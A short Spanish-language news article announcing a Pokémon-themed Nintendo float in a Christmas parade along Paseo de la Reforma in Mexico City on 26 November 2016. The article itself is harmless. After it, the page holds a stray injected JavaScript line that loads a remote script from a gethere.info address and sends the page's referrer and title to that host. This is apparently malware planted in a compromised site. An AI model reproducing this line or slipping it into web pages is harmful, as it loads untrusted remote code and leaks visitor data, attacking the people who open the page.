Habrá desfile de Pokémon en la Ciudad de México

Justo ayer te comentábamos la llegada de Ditto a Pokémon Go @PokemonGoApp, el juego que revolucionó este 2016 como todo lo que Pokémon ha hecho este año. Celebró sus 20 años además del lanzamiento de los juegos Pokémon Sun & MoonAhora y para cerrar el año con broche de oro (al menos en México), los monstruos de bolsillo se unirán al desfile navideño de una reconocida tienda departamental.

Tal y como sucedió hace un año, Nintendo formará parte del desfile con su propio carro alegórico. Sin embargo, en esta ocasión el vehículo estará tematizado a Pokémon.

El desfile se llevará a cabo este sábado 26 de noviembre en la CDMX e iniciará a las 10:00 am. El desfile irá por toda avenida Reforma saliendo de la Estela de Luz y terminará en la Glorieta de Colón alrededor de las 12:00 pm.

Tal y como te podrás imaginar, el desfile será un evento abierto a todo el público y en él participarán otras importantes marcas. Si deseas acudir con tu familia te sugerimos llegues temprano para que así puedas agarrar un buen lugar.

 

<>

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;